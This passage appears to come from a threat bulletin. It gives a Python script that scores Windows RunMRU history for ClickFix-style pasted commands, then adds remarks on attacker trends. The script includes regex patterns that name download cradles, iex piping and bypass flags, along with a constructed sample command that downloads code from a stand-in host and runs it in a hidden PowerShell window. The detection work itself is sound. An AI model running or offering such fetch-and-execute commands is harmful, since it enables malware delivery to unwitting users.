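Whatever the delivery framework or TDS, ClickFix ends the same way: the victim pastes a command into the Run dialog, and Explorer records that command under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, each value ending in a literal `\1`. The script below is an added example (not Sekoia's tooling) that scores RunMRU values for the markers these pasted commands share: a hidden window, a download cradle, piping into `iex`, a base64 `-EncodedCommand`, policy-bypass flags, and the "I am not a robot" padding that makes the command look benign in the dialog. The entries are constructed; on a live host they would be read with `winreg`, which this offline example does not do.

```python
"""Score Windows Run-dialog history (RunMRU) for ClickFix-style pasted commands (added example)."""
import base64
import re

INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|certutil|mshta|bitsadmin)\b", re.I)),
    ("invoke_expression", re.compile(r"\|\s*(?:iex|invoke-expression)\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypass_flags", re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)),
    ("captcha_text", re.compile(r"\u2705|I am not a robot|verification", re.I)),
]
# Any one of these alone is enough to call the entry suspicious.
HIGH_CONFIDENCE = {"download_cradle", "invoke_expression", "encoded_command"}
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def strip_mru(value):
    """RunMRU stores each command with a trailing '\\1'; remove it."""
    return value[:-2] if value.endswith("\\1") else value


def decode_encoded_command(command):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_runmru(values):
    """Score every RunMRU value; 'MRUList' only records ordering and is skipped."""
    results = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        command = strip_mru(raw)
        hits = [label for label, rx in INDICATORS if rx.search(command)]
        results.append({
            "value_name": name,
            "command": command,
            "indicators": hits,
            "decoded": decode_encoded_command(command),
            "suspicious": bool(set(hits) & HIGH_CONFIDENCE) or len(hits) >= 2,
        })
    return results


# Constructed RunMRU export. The encoded payload is a harmless Write-Host.
ENCODED = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -nop -c "iwr https://example.invalid/x | iex" # \u2705 I am not a robot' + r"\1",
    "b": r"notepad\1",
    "c": "cmd /c start /min powershell -enc " + ENCODED + r"\1",
    "MRUList": "cba",
}

if __name__ == "__main__":
    for r in analyse_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag}] {r['value_name']}: {r['indicators']} decoded={r['decoded']!r}")
```

Pair this with Sysmon or EDR telemetry for `explorer.exe` spawning `powershell.exe`, `mshta.exe` or `cmd.exe`; the RunMRU value gives you the exact command the user pasted, which the process tree alone may not preserve once the first stage deletes itself.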

Across these updates, the common thread is operational efficiency. Attackers are cutting time between access and impact, removing friction from tooling, and relying more on automation, prebuilt frameworks, and reusable infrastructure. Speed is no longer a byproduct — it’s a design goal.

Another shift sits on the defensive side. Several cases show how security gaps are forming not from unknown threats, but from known behaviors — legacy configurations, trusted integrations, overlooked exposure, and assumptions about how tools should behave.

Taken together, the signals point to a threat environment that is scaling quietly rather than loudly — broader reach, lower visibility, and faster execution cycles. The fragments in this bulletin map that direction.
